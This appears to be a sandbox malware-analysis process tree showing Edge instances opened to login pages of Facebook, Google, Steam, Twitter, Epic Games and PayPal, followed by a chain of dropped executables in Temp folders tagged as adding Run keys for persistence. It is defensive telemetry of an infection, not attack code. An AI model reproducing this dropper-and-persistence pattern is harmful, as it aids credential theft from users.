"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,12339638870778142133,9237260555541742693,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
6⤵
PID:1468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
5⤵
PID:1312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:3588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,8835068284573826905,12982689170527175692,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
6⤵
PID:1940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8835068284573826905,12982689170527175692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
6⤵
PID:2036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:1196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
6⤵
PID:4216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
6⤵
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
6⤵
PID:4152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
6⤵
PID:5484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
6⤵
PID:5472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
6⤵
PID:5808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
6⤵
PID:5940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:1
6⤵
PID:6132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
6⤵
PID:4640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
6⤵
PID:5520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
6⤵
PID:5932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
6⤵
PID:336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
6⤵
PID:6160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
6⤵
PID:6456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
6⤵
PID:6484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
6⤵
PID:6536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
6⤵
PID:6844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
6⤵
PID:5524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1
6⤵
PID:6972

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8
6⤵
PID:2620

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8
6⤵
PID:5216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2496 /prefetch:1
6⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7808 /prefetch:1
6⤵
PID:4348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1
6⤵
PID:5464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7060 /prefetch:8
6⤵
PID:6840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
6⤵
PID:5548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:1
6⤵
PID:2296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9104 /prefetch:1
6⤵
PID:6644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8944 /prefetch:1
6⤵
PID:5552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7360 /prefetch:1
6⤵
PID:5148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:1
6⤵
PID:7276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:1
6⤵
PID:7408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9280 /prefetch:1
6⤵
PID:7580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9472 /prefetch:1
6⤵
PID:7744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10348 /prefetch:1
6⤵
PID:7816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,8401255772868346870,17023059795597032702,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=11004 /prefetch:8
6⤵
PID:7148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
5⤵
PID:3104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:4892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,8320960995905947497,5125231113105770558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
6⤵
PID:5296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,8320960995905947497,5125231113105770558,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
6⤵
PID:5284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
5⤵
PID:4620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:1516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
5⤵
PID:3008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:3396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
5⤵
PID:5960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:6012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
5⤵
PID:5144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:3640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
5⤵
PID:6336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:6356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:6348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:6408

C:\Users\Admin\AppData\Local\Temp\F06B.exe
C:\Users\Admin\AppData\Local\Temp\F06B.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4156

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\je8Ld4MI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\je8Ld4MI.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2260

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sZ7wM8YI.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sZ7wM8YI.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:7160

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\os2wG0Om.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\os2wG0Om.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5032

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zS5oH4qY.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zS5oH4qY.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5376

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1gH93or0.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1gH93or0.exe
7⤵
- Executes dropped EXE
